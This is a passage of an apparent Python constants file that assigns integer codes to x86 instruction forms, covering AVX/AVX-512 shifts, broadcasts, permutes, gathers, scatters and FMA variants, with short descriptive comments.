VEX_VPSLLVD_XMM_XMM_XMMM128: int = 3045
VEX_VPSLLVD_YMM_YMM_YMMM256: int = 3046
VEX_VPSLLVQ_XMM_XMM_XMMM128: int = 3047
VEX_VPSLLVQ_YMM_YMM_YMMM256: int = 3048
EVEX_VPSLLVD_XMM_K1Z_XMM_XMMM128B32: int = 3049
EVEX_VPSLLVD_YMM_K1Z_YMM_YMMM256B32: int = 3050
EVEX_VPSLLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3051
EVEX_VPSLLVQ_XMM_K1Z_XMM_XMMM128B64: int = 3052
EVEX_VPSLLVQ_YMM_K1Z_YMM_YMMM256B64: int = 3053
EVEX_VPSLLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3054
EVEX_VRCP14PS_XMM_K1Z_XMMM128B32: int = 3055
EVEX_VRCP14PS_YMM_K1Z_YMMM256B32: int = 3056
EVEX_VRCP14PS_ZMM_K1Z_ZMMM512B32: int = 3057
EVEX_VRCP14PD_XMM_K1Z_XMMM128B64: int = 3058
EVEX_VRCP14PD_YMM_K1Z_YMMM256B64: int = 3059
EVEX_VRCP14PD_ZMM_K1Z_ZMMM512B64: int = 3060
EVEX_VRCP14SS_XMM_K1Z_XMM_XMMM32: int = 3061
EVEX_VRCP14SD_XMM_K1Z_XMM_XMMM64: int = 3062
EVEX_VRSQRT14PS_XMM_K1Z_XMMM128B32: int = 3063
EVEX_VRSQRT14PS_YMM_K1Z_YMMM256B32: int = 3064
EVEX_VRSQRT14PS_ZMM_K1Z_ZMMM512B32: int = 3065
EVEX_VRSQRT14PD_XMM_K1Z_XMMM128B64: int = 3066
EVEX_VRSQRT14PD_YMM_K1Z_YMMM256B64: int = 3067
EVEX_VRSQRT14PD_ZMM_K1Z_ZMMM512B64: int = 3068
EVEX_VRSQRT14SS_XMM_K1Z_XMM_XMMM32: int = 3069
EVEX_VRSQRT14SD_XMM_K1Z_XMM_XMMM64: int = 3070
# VPDP*/VDPBF16PS — dot-product / AI acceleration forms (VNNI, BF16).
EVEX_VPDPBUSD_XMM_K1Z_XMM_XMMM128B32: int = 3071
EVEX_VPDPBUSD_YMM_K1Z_YMM_YMMM256B32: int = 3072
EVEX_VPDPBUSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3073
EVEX_VPDPBUSDS_XMM_K1Z_XMM_XMMM128B32: int = 3074
EVEX_VPDPBUSDS_YMM_K1Z_YMM_YMMM256B32: int = 3075
EVEX_VPDPBUSDS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3076
EVEX_VPDPWSSD_XMM_K1Z_XMM_XMMM128B32: int = 3077
EVEX_VPDPWSSD_YMM_K1Z_YMM_YMMM256B32: int = 3078
EVEX_VPDPWSSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3079
EVEX_VDPBF16PS_XMM_K1Z_XMM_XMMM128B32: int = 3080
EVEX_VDPBF16PS_YMM_K1Z_YMM_YMMM256B32: int = 3081
EVEX_VDPBF16PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3082
EVEX_VP4DPWSSD_ZMM_K1Z_ZMMP3_M128: int = 3083
EVEX_VPDPWSSDS_XMM_K1Z_XMM_XMMM128B32: int = 3084
EVEX_VPDPWSSDS_YMM_K1Z_YMM_YMMM256B32: int = 3085
EVEX_VPDPWSSDS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3086
EVEX_VP4DPWSSDS_ZMM_K1Z_ZMMP3_M128: int = 3087
EVEX_VPOPCNTB_XMM_K1Z_XMMM128: int = 3088
EVEX_VPOPCNTB_YMM_K1Z_YMMM256: int = 3089
EVEX_VPOPCNTB_ZMM_K1Z_ZMMM512: int = 3090
EVEX_VPOPCNTW_XMM_K1Z_XMMM128: int = 3091
EVEX_VPOPCNTW_YMM_K1Z_YMMM256: int = 3092
EVEX_VPOPCNTW_ZMM_K1Z_ZMMM512: int = 3093
EVEX_VPOPCNTD_XMM_K1Z_XMMM128B32: int = 3094
EVEX_VPOPCNTD_YMM_K1Z_YMMM256B32: int = 3095
EVEX_VPOPCNTD_ZMM_K1Z_ZMMM512B32: int = 3096
EVEX_VPOPCNTQ_XMM_K1Z_XMMM128B64: int = 3097
EVEX_VPOPCNTQ_YMM_K1Z_YMMM256B64: int = 3098
EVEX_VPOPCNTQ_ZMM_K1Z_ZMMM512B64: int = 3099
# VPBROADCAST*/VBROADCASTI* — element and tuple broadcast forms.
VEX_VPBROADCASTD_XMM_XMMM32: int = 3100
VEX_VPBROADCASTD_YMM_XMMM32: int = 3101
EVEX_VPBROADCASTD_XMM_K1Z_XMMM32: int = 3102
EVEX_VPBROADCASTD_YMM_K1Z_XMMM32: int = 3103
EVEX_VPBROADCASTD_ZMM_K1Z_XMMM32: int = 3104
VEX_VPBROADCASTQ_XMM_XMMM64: int = 3105
VEX_VPBROADCASTQ_YMM_XMMM64: int = 3106
EVEX_VBROADCASTI32X2_XMM_K1Z_XMMM64: int = 3107
EVEX_VBROADCASTI32X2_YMM_K1Z_XMMM64: int = 3108
EVEX_VBROADCASTI32X2_ZMM_K1Z_XMMM64: int = 3109
EVEX_VPBROADCASTQ_XMM_K1Z_XMMM64: int = 3110
EVEX_VPBROADCASTQ_YMM_K1Z_XMMM64: int = 3111
EVEX_VPBROADCASTQ_ZMM_K1Z_XMMM64: int = 3112
VEX_VBROADCASTI128_YMM_M128: int = 3113
EVEX_VBROADCASTI32X4_YMM_K1Z_M128: int = 3114
EVEX_VBROADCASTI32X4_ZMM_K1Z_M128: int = 3115
EVEX_VBROADCASTI64X2_YMM_K1Z_M128: int = 3116
EVEX_VBROADCASTI64X2_ZMM_K1Z_M128: int = 3117
EVEX_VBROADCASTI32X8_ZMM_K1Z_M256: int = 3118
EVEX_VBROADCASTI64X4_ZMM_K1Z_M256: int = 3119
EVEX_VPEXPANDB_XMM_K1Z_XMMM128: int = 3120
EVEX_VPEXPANDB_YMM_K1Z_YMMM256: int = 3121
EVEX_VPEXPANDB_ZMM_K1Z_ZMMM512: int = 3122
EVEX_VPEXPANDW_XMM_K1Z_XMMM128: int = 3123
EVEX_VPEXPANDW_YMM_K1Z_YMMM256: int = 3124
EVEX_VPEXPANDW_ZMM_K1Z_ZMMM512: int = 3125
EVEX_VPCOMPRESSB_XMMM128_K1Z_XMM: int = 3126
EVEX_VPCOMPRESSB_YMMM256_K1Z_YMM: int = 3127
EVEX_VPCOMPRESSB_ZMMM512_K1Z_ZMM: int = 3128
EVEX_VPCOMPRESSW_XMMM128_K1Z_XMM: int = 3129
EVEX_VPCOMPRESSW_YMMM256_K1Z_YMM: int = 3130
EVEX_VPCOMPRESSW_ZMMM512_K1Z_ZMM: int = 3131
EVEX_VPBLENDMD_XMM_K1Z_XMM_XMMM128B32: int = 3132
EVEX_VPBLENDMD_YMM_K1Z_YMM_YMMM256B32: int = 3133
EVEX_VPBLENDMD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3134
EVEX_VPBLENDMQ_XMM_K1Z_XMM_XMMM128B64: int = 3135
EVEX_VPBLENDMQ_YMM_K1Z_YMM_YMMM256B64: int = 3136
EVEX_VPBLENDMQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3137
EVEX_VBLENDMPS_XMM_K1Z_XMM_XMMM128B32: int = 3138
EVEX_VBLENDMPS_YMM_K1Z_YMM_YMMM256B32: int = 3139
EVEX_VBLENDMPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3140
EVEX_VBLENDMPD_XMM_K1Z_XMM_XMMM128B64: int = 3141
EVEX_VBLENDMPD_YMM_K1Z_YMM_YMMM256B64: int = 3142
EVEX_VBLENDMPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3143
EVEX_VPBLENDMB_XMM_K1Z_XMM_XMMM128: int = 3144
EVEX_VPBLENDMB_YMM_K1Z_YMM_YMMM256: int = 3145
EVEX_VPBLENDMB_ZMM_K1Z_ZMM_ZMMM512: int = 3146
EVEX_VPBLENDMW_XMM_K1Z_XMM_XMMM128: int = 3147
EVEX_VPBLENDMW_YMM_K1Z_YMM_YMMM256: int = 3148
EVEX_VPBLENDMW_ZMM_K1Z_ZMM_ZMMM512: int = 3149
EVEX_VP2INTERSECTD_KP1_XMM_XMMM128B32: int = 3150
EVEX_VP2INTERSECTD_KP1_YMM_YMMM256B32: int = 3151
EVEX_VP2INTERSECTD_KP1_ZMM_ZMMM512B32: int = 3152
EVEX_VP2INTERSECTQ_KP1_XMM_XMMM128B64: int = 3153
EVEX_VP2INTERSECTQ_KP1_YMM_YMMM256B64: int = 3154
EVEX_VP2INTERSECTQ_KP1_ZMM_ZMMM512B64: int = 3155
EVEX_VPSHLDVW_XMM_K1Z_XMM_XMMM128: int = 3156
EVEX_VPSHLDVW_YMM_K1Z_YMM_YMMM256: int = 3157
EVEX_VPSHLDVW_ZMM_K1Z_ZMM_ZMMM512: int = 3158
EVEX_VPSHLDVD_XMM_K1Z_XMM_XMMM128B32: int = 3159
EVEX_VPSHLDVD_YMM_K1Z_YMM_YMMM256B32: int = 3160
EVEX_VPSHLDVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3161
EVEX_VPSHLDVQ_XMM_K1Z_XMM_XMMM128B64: int = 3162
EVEX_VPSHLDVQ_YMM_K1Z_YMM_YMMM256B64: int = 3163
EVEX_VPSHLDVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3164
EVEX_VPSHRDVW_XMM_K1Z_XMM_XMMM128: int = 3165
EVEX_VPSHRDVW_YMM_K1Z_YMM_YMMM256: int = 3166
EVEX_VPSHRDVW_ZMM_K1Z_ZMM_ZMMM512: int = 3167
EVEX_VCVTNEPS2BF16_XMM_K1Z_XMMM128B32: int = 3168
EVEX_VCVTNEPS2BF16_XMM_K1Z_YMMM256B32: int = 3169
EVEX_VCVTNEPS2BF16_YMM_K1Z_ZMMM512B32: int = 3170
EVEX_VCVTNE2PS2BF16_XMM_K1Z_XMM_XMMM128B32: int = 3171
EVEX_VCVTNE2PS2BF16_YMM_K1Z_YMM_YMMM256B32: int = 3172
EVEX_VCVTNE2PS2BF16_ZMM_K1Z_ZMM_ZMMM512B32: int = 3173
EVEX_VPSHRDVD_XMM_K1Z_XMM_XMMM128B32: int = 3174
EVEX_VPSHRDVD_YMM_K1Z_YMM_YMMM256B32: int = 3175
EVEX_VPSHRDVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3176
EVEX_VPSHRDVQ_XMM_K1Z_XMM_XMMM128B64: int = 3177
EVEX_VPSHRDVQ_YMM_K1Z_YMM_YMMM256B64: int = 3178
EVEX_VPSHRDVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3179
# VPERMI2*/VPERMT2* — two-table full permute forms.
EVEX_VPERMI2B_XMM_K1Z_XMM_XMMM128: int = 3180
EVEX_VPERMI2B_YMM_K1Z_YMM_YMMM256: int = 3181
EVEX_VPERMI2B_ZMM_K1Z_ZMM_ZMMM512: int = 3182
EVEX_VPERMI2W_XMM_K1Z_XMM_XMMM128: int = 3183
EVEX_VPERMI2W_YMM_K1Z_YMM_YMMM256: int = 3184
EVEX_VPERMI2W_ZMM_K1Z_ZMM_ZMMM512: int = 3185
EVEX_VPERMI2D_XMM_K1Z_XMM_XMMM128B32: int = 3186
EVEX_VPERMI2D_YMM_K1Z_YMM_YMMM256B32: int = 3187
EVEX_VPERMI2D_ZMM_K1Z_ZMM_ZMMM512B32: int = 3188
EVEX_VPERMI2Q_XMM_K1Z_XMM_XMMM128B64: int = 3189
EVEX_VPERMI2Q_YMM_K1Z_YMM_YMMM256B64: int = 3190
EVEX_VPERMI2Q_ZMM_K1Z_ZMM_ZMMM512B64: int = 3191
EVEX_VPERMI2PS_XMM_K1Z_XMM_XMMM128B32: int = 3192
EVEX_VPERMI2PS_YMM_K1Z_YMM_YMMM256B32: int = 3193
EVEX_VPERMI2PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3194
EVEX_VPERMI2PD_XMM_K1Z_XMM_XMMM128B64: int = 3195
EVEX_VPERMI2PD_YMM_K1Z_YMM_YMMM256B64: int = 3196
EVEX_VPERMI2PD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3197
VEX_VPBROADCASTB_XMM_XMMM8: int = 3198
VEX_VPBROADCASTB_YMM_XMMM8: int = 3199
EVEX_VPBROADCASTB_XMM_K1Z_XMMM8: int = 3200
EVEX_VPBROADCASTB_YMM_K1Z_XMMM8: int = 3201
EVEX_VPBROADCASTB_ZMM_K1Z_XMMM8: int = 3202
VEX_VPBROADCASTW_XMM_XMMM16: int = 3203
VEX_VPBROADCASTW_YMM_XMMM16: int = 3204
EVEX_VPBROADCASTW_XMM_K1Z_XMMM16: int = 3205
EVEX_VPBROADCASTW_YMM_K1Z_XMMM16: int = 3206
EVEX_VPBROADCASTW_ZMM_K1Z_XMMM16: int = 3207
EVEX_VPBROADCASTB_XMM_K1Z_R32: int = 3208
EVEX_VPBROADCASTB_YMM_K1Z_R32: int = 3209
EVEX_VPBROADCASTB_ZMM_K1Z_R32: int = 3210
EVEX_VPBROADCASTW_XMM_K1Z_R32: int = 3211
EVEX_VPBROADCASTW_YMM_K1Z_R32: int = 3212
EVEX_VPBROADCASTW_ZMM_K1Z_R32: int = 3213
EVEX_VPBROADCASTD_XMM_K1Z_R32: int = 3214
EVEX_VPBROADCASTD_YMM_K1Z_R32: int = 3215
EVEX_VPBROADCASTD_ZMM_K1Z_R32: int = 3216
EVEX_VPBROADCASTQ_XMM_K1Z_R64: int = 3217
EVEX_VPBROADCASTQ_YMM_K1Z_R64: int = 3218
EVEX_VPBROADCASTQ_ZMM_K1Z_R64: int = 3219
EVEX_VPERMT2B_XMM_K1Z_XMM_XMMM128: int = 3220
EVEX_VPERMT2B_YMM_K1Z_YMM_YMMM256: int = 3221
EVEX_VPERMT2B_ZMM_K1Z_ZMM_ZMMM512: int = 3222
EVEX_VPERMT2W_XMM_K1Z_XMM_XMMM128: int = 3223
EVEX_VPERMT2W_YMM_K1Z_YMM_YMMM256: int = 3224
EVEX_VPERMT2W_ZMM_K1Z_ZMM_ZMMM512: int = 3225
EVEX_VPERMT2D_XMM_K1Z_XMM_XMMM128B32: int = 3226
EVEX_VPERMT2D_YMM_K1Z_YMM_YMMM256B32: int = 3227
EVEX_VPERMT2D_ZMM_K1Z_ZMM_ZMMM512B32: int = 3228
EVEX_VPERMT2Q_XMM_K1Z_XMM_XMMM128B64: int = 3229
EVEX_VPERMT2Q_YMM_K1Z_YMM_YMMM256B64: int = 3230
EVEX_VPERMT2Q_ZMM_K1Z_ZMM_ZMMM512B64: int = 3231
EVEX_VPERMT2PS_XMM_K1Z_XMM_XMMM128B32: int = 3232
EVEX_VPERMT2PS_YMM_K1Z_YMM_YMMM256B32: int = 3233
EVEX_VPERMT2PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3234
EVEX_VPERMT2PD_XMM_K1Z_XMM_XMMM128B64: int = 3235
EVEX_VPERMT2PD_YMM_K1Z_YMM_YMMM256B64: int = 3236
EVEX_VPERMT2PD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3237
# System-level TLB/cache invalidation forms (VMX / PCID).
INVEPT_R32_M128: int = 3238
INVEPT_R64_M128: int = 3239
INVVPID_R32_M128: int = 3240
INVVPID_R64_M128: int = 3241
INVPCID_R32_M128: int = 3242
INVPCID_R64_M128: int = 3243
EVEX_VPMULTISHIFTQB_XMM_K1Z_XMM_XMMM128B64: int = 3244
EVEX_VPMULTISHIFTQB_YMM_K1Z_YMM_YMMM256B64: int = 3245
EVEX_VPMULTISHIFTQB_ZMM_K1Z_ZMM_ZMMM512B64: int = 3246
EVEX_VEXPANDPS_XMM_K1Z_XMMM128: int = 3247
EVEX_VEXPANDPS_YMM_K1Z_YMMM256: int = 3248
EVEX_VEXPANDPS_ZMM_K1Z_ZMMM512: int = 3249
EVEX_VEXPANDPD_XMM_K1Z_XMMM128: int = 3250
EVEX_VEXPANDPD_YMM_K1Z_YMMM256: int = 3251
EVEX_VEXPANDPD_ZMM_K1Z_ZMMM512: int = 3252
EVEX_VPEXPANDD_XMM_K1Z_XMMM128: int = 3253
EVEX_VPEXPANDD_YMM_K1Z_YMMM256: int = 3254
EVEX_VPEXPANDD_ZMM_K1Z_ZMMM512: int = 3255
EVEX_VPEXPANDQ_XMM_K1Z_XMMM128: int = 3256
EVEX_VPEXPANDQ_YMM_K1Z_YMMM256: int = 3257
EVEX_VPEXPANDQ_ZMM_K1Z_ZMMM512: int = 3258
EVEX_VCOMPRESSPS_XMMM128_K1Z_XMM: int = 3259
EVEX_VCOMPRESSPS_YMMM256_K1Z_YMM: int = 3260
EVEX_VCOMPRESSPS_ZMMM512_K1Z_ZMM: int = 3261
EVEX_VCOMPRESSPD_XMMM128_K1Z_XMM: int = 3262
EVEX_VCOMPRESSPD_YMMM256_K1Z_YMM: int = 3263
EVEX_VCOMPRESSPD_ZMMM512_K1Z_ZMM: int = 3264
EVEX_VPCOMPRESSD_XMMM128_K1Z_XMM: int = 3265
EVEX_VPCOMPRESSD_YMMM256_K1Z_YMM: int = 3266
EVEX_VPCOMPRESSD_ZMMM512_K1Z_ZMM: int = 3267
EVEX_VPCOMPRESSQ_XMMM128_K1Z_XMM: int = 3268
EVEX_VPCOMPRESSQ_YMMM256_K1Z_YMM: int = 3269
EVEX_VPCOMPRESSQ_ZMMM512_K1Z_ZMM: int = 3270
VEX_VPMASKMOVD_XMM_XMM_M128: int = 3271
VEX_VPMASKMOVD_YMM_YMM_M256: int = 3272
VEX_VPMASKMOVQ_XMM_XMM_M128: int = 3273
VEX_VPMASKMOVQ_YMM_YMM_M256: int = 3274
EVEX_VPERMB_XMM_K1Z_XMM_XMMM128: int = 3275
EVEX_VPERMB_YMM_K1Z_YMM_YMMM256: int = 3276
EVEX_VPERMB_ZMM_K1Z_ZMM_ZMMM512: int = 3277
EVEX_VPERMW_XMM_K1Z_XMM_XMMM128: int = 3278
EVEX_VPERMW_YMM_K1Z_YMM_YMMM256: int = 3279
EVEX_VPERMW_ZMM_K1Z_ZMM_ZMMM512: int = 3280
VEX_VPMASKMOVD_M128_XMM_XMM: int = 3281
VEX_VPMASKMOVD_M256_YMM_YMM: int = 3282
VEX_VPMASKMOVQ_M128_XMM_XMM: int = 3283
VEX_VPMASKMOVQ_M256_YMM_YMM: int = 3284
EVEX_VPSHUFBITQMB_KR_K1_XMM_XMMM128: int = 3285
EVEX_VPSHUFBITQMB_KR_K1_YMM_YMMM256: int = 3286
EVEX_VPSHUFBITQMB_KR_K1_ZMM_ZMMM512: int = 3287
# Gather forms — VM32/VM64 operands are vector-indexed memory (VSIB addressing).
VEX_VPGATHERDD_XMM_VM32X_XMM: int = 3288
VEX_VPGATHERDD_YMM_VM32Y_YMM: int = 3289
VEX_VPGATHERDQ_XMM_VM32X_XMM: int = 3290
VEX_VPGATHERDQ_YMM_VM32X_YMM: int = 3291
EVEX_VPGATHERDD_XMM_K1_VM32X: int = 3292
EVEX_VPGATHERDD_YMM_K1_VM32Y: int = 3293
EVEX_VPGATHERDD_ZMM_K1_VM32Z: int = 3294
EVEX_VPGATHERDQ_XMM_K1_VM32X: int = 3295
EVEX_VPGATHERDQ_YMM_K1_VM32X: int = 3296
EVEX_VPGATHERDQ_ZMM_K1_VM32Y: int = 3297
VEX_VPGATHERQD_XMM_VM64X_XMM: int = 3298
VEX_VPGATHERQD_XMM_VM64Y_XMM: int = 3299
VEX_VPGATHERQQ_XMM_VM64X_XMM: int = 3300
VEX_VPGATHERQQ_YMM_VM64Y_YMM: int = 3301
EVEX_VPGATHERQD_XMM_K1_VM64X: int = 3302
EVEX_VPGATHERQD_XMM_K1_VM64Y: int = 3303
EVEX_VPGATHERQD_YMM_K1_VM64Z: int = 3304
EVEX_VPGATHERQQ_XMM_K1_VM64X: int = 3305
EVEX_VPGATHERQQ_YMM_K1_VM64Y: int = 3306
EVEX_VPGATHERQQ_ZMM_K1_VM64Z: int = 3307
VEX_VGATHERDPS_XMM_VM32X_XMM: int = 3308
VEX_VGATHERDPS_YMM_VM32Y_YMM: int = 3309
VEX_VGATHERDPD_XMM_VM32X_XMM: int = 3310
VEX_VGATHERDPD_YMM_VM32X_YMM: int = 3311
EVEX_VGATHERDPS_XMM_K1_VM32X: int = 3312
EVEX_VGATHERDPS_YMM_K1_VM32Y: int = 3313
EVEX_VGATHERDPS_ZMM_K1_VM32Z: int = 3314
EVEX_VGATHERDPD_XMM_K1_VM32X: int = 3315
EVEX_VGATHERDPD_YMM_K1_VM32X: int = 3316
EVEX_VGATHERDPD_ZMM_K1_VM32Y: int = 3317
VEX_VGATHERQPS_XMM_VM64X_XMM: int = 3318
VEX_VGATHERQPS_XMM_VM64Y_XMM: int = 3319
VEX_VGATHERQPD_XMM_VM64X_XMM: int = 3320
VEX_VGATHERQPD_YMM_VM64Y_YMM: int = 3321
EVEX_VGATHERQPS_XMM_K1_VM64X: int = 3322
EVEX_VGATHERQPS_XMM_K1_VM64Y: int = 3323
EVEX_VGATHERQPS_YMM_K1_VM64Z: int = 3324
EVEX_VGATHERQPD_XMM_K1_VM64X: int = 3325
EVEX_VGATHERQPD_YMM_K1_VM64Y: int = 3326
EVEX_VGATHERQPD_ZMM_K1_VM64Z: int = 3327
# FMA families — the 132/213/231 infix encodes the operand-order variant.
VEX_VFMADDSUB132PS_XMM_XMM_XMMM128: int = 3328
VEX_VFMADDSUB132PS_YMM_YMM_YMMM256: int = 3329
VEX_VFMADDSUB132PD_XMM_XMM_XMMM128: int = 3330
VEX_VFMADDSUB132PD_YMM_YMM_YMMM256: int = 3331
EVEX_VFMADDSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3332
EVEX_VFMADDSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3333
EVEX_VFMADDSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3334
EVEX_VFMADDSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3335
EVEX_VFMADDSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3336
EVEX_VFMADDSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3337
VEX_VFMSUBADD132PS_XMM_XMM_XMMM128: int = 3338
VEX_VFMSUBADD132PS_YMM_YMM_YMMM256: int = 3339
VEX_VFMSUBADD132PD_XMM_XMM_XMMM128: int = 3340
VEX_VFMSUBADD132PD_YMM_YMM_YMMM256: int = 3341
EVEX_VFMSUBADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3342
EVEX_VFMSUBADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3343
EVEX_VFMSUBADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3344
EVEX_VFMSUBADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3345
EVEX_VFMSUBADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3346
EVEX_VFMSUBADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3347
VEX_VFMADD132PS_XMM_XMM_XMMM128: int = 3348
VEX_VFMADD132PS_YMM_YMM_YMMM256: int = 3349
VEX_VFMADD132PD_XMM_XMM_XMMM128: int = 3350
VEX_VFMADD132PD_YMM_YMM_YMMM256: int = 3351
EVEX_VFMADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3352
EVEX_VFMADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3353
EVEX_VFMADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3354
EVEX_VFMADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3355
EVEX_VFMADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3356
EVEX_VFMADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3357
VEX_VFMADD132SS_XMM_XMM_XMMM32: int = 3358
VEX_VFMADD132SD_XMM_XMM_XMMM64: int = 3359
EVEX_VFMADD132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3360
EVEX_VFMADD132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3361
VEX_VFMSUB132PS_XMM_XMM_XMMM128: int = 3362
VEX_VFMSUB132PS_YMM_YMM_YMMM256: int = 3363
VEX_VFMSUB132PD_XMM_XMM_XMMM128: int = 3364
VEX_VFMSUB132PD_YMM_YMM_YMMM256: int = 3365
EVEX_VFMSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3366
EVEX_VFMSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3367
EVEX_VFMSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3368
EVEX_VFMSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3369
EVEX_VFMSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3370
EVEX_VFMSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3371
EVEX_V4FMADDPS_ZMM_K1Z_ZMMP3_M128: int = 3372
VEX_VFMSUB132SS_XMM_XMM_XMMM32: int = 3373
VEX_VFMSUB132SD_XMM_XMM_XMMM64: int = 3374
EVEX_VFMSUB132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3375
EVEX_VFMSUB132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3376
EVEX_V4FMADDSS_XMM_K1Z_XMMP3_M128: int = 3377
VEX_VFNMADD132PS_XMM_XMM_XMMM128: int = 3378
VEX_VFNMADD132PS_YMM_YMM_YMMM256: int = 3379
VEX_VFNMADD132PD_XMM_XMM_XMMM128: int = 3380
VEX_VFNMADD132PD_YMM_YMM_YMMM256: int = 3381
EVEX_VFNMADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3382
EVEX_VFNMADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3383
EVEX_VFNMADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3384
EVEX_VFNMADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3385
EVEX_VFNMADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3386
EVEX_VFNMADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3387
VEX_VFNMADD132SS_XMM_XMM_XMMM32: int = 3388
VEX_VFNMADD132SD_XMM_XMM_XMMM64: int = 3389
EVEX_VFNMADD132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3390
EVEX_VFNMADD132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3391
VEX_VFNMSUB132PS_XMM_XMM_XMMM128: int = 3392
VEX_VFNMSUB132PS_YMM_YMM_YMMM256: int = 3393
VEX_VFNMSUB132PD_XMM_XMM_XMMM128: int = 3394
VEX_VFNMSUB132PD_YMM_YMM_YMMM256: int = 3395
EVEX_VFNMSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3396
EVEX_VFNMSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3397
EVEX_VFNMSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3398
EVEX_VFNMSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3399
EVEX_VFNMSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3400
EVEX_VFNMSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3401
VEX_VFNMSUB132SS_XMM_XMM_XMMM32: int = 3402
VEX_VFNMSUB132SD_XMM_XMM_XMMM64: int = 3403
EVEX_VFNMSUB132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3404
EVEX_VFNMSUB132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3405
# Scatter forms — destination is vector-indexed memory, masked by K1.
EVEX_VPSCATTERDD_VM32X_K1_XMM: int = 3406
EVEX_VPSCATTERDD_VM32Y_K1_YMM: int = 3407
EVEX_VPSCATTERDD_VM32Z_K1_ZMM: int = 3408
EVEX_VPSCATTERDQ_VM32X_K1_XMM: int = 3409
EVEX_VPSCATTERDQ_VM32X_K1_YMM: int = 3410
EVEX_VPSCATTERDQ_VM32Y_K1_ZMM: int = 3411
EVEX_VPSCATTERQD_VM64X_K1_XMM: int = 3412
EVEX_VPSCATTERQD_VM64Y_K1_XMM: int = 3413
EVEX_VPSCATTERQD_VM64Z_K1_YMM: int = 3414
EVEX_VPSCATTERQQ_VM64X_K1_XMM: int = 3415
EVEX_VPSCATTERQQ_VM64Y_K1_YMM: int = 3416
EVEX_VPSCATTERQQ_VM64Z_K1_ZMM: int = 3417
EVEX_VSCATTERDPS_VM32X_K1_XMM: int = 3418
EVEX_VSCATTERDPS_VM32Y_K1_YMM: int = 3419
EVEX_VSCATTERDPS_VM32Z_K1_ZMM: int = 3420
EVEX_VSCATTERDPD_VM32X_K1_XMM: int = 3421
EVEX_VSCATTERDPD_VM32X_K1_YMM: int = 3422
EVEX_VSCATTERDPD_VM32Y_K1_ZMM: int = 3423
EVEX_VSCATTERQPS_VM64X_K1_XMM: int = 3424
EVEX_VSCATTERQPS_VM64Y_K1_XMM: int = 3425
EVEX_VSCATTERQPS_VM64Z_K1_YMM: int = 3426
EVEX_VSCATTERQPD_VM64X_K1_XMM: int = 3427
EVEX_VSCATTERQPD_VM64Y_K1_YMM: int = 3428
EVEX_VSCATTERQPD_VM64Z_K1_ZMM: int = 3429
VEX_VFMADDSUB213PS_XMM_XMM_XMMM128: int = 3430
VEX_VFMADDSUB213PS_YMM_YMM_YMMM256: int = 3431
VEX_VFMADDSUB213PD_XMM_XMM_XMMM128: int = 3432
VEX_VFMADDSUB213PD_YMM_YMM_YMMM256: int = 3433
EVEX_VFMADDSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3434
EVEX_VFMADDSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3435
EVEX_VFMADDSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3436
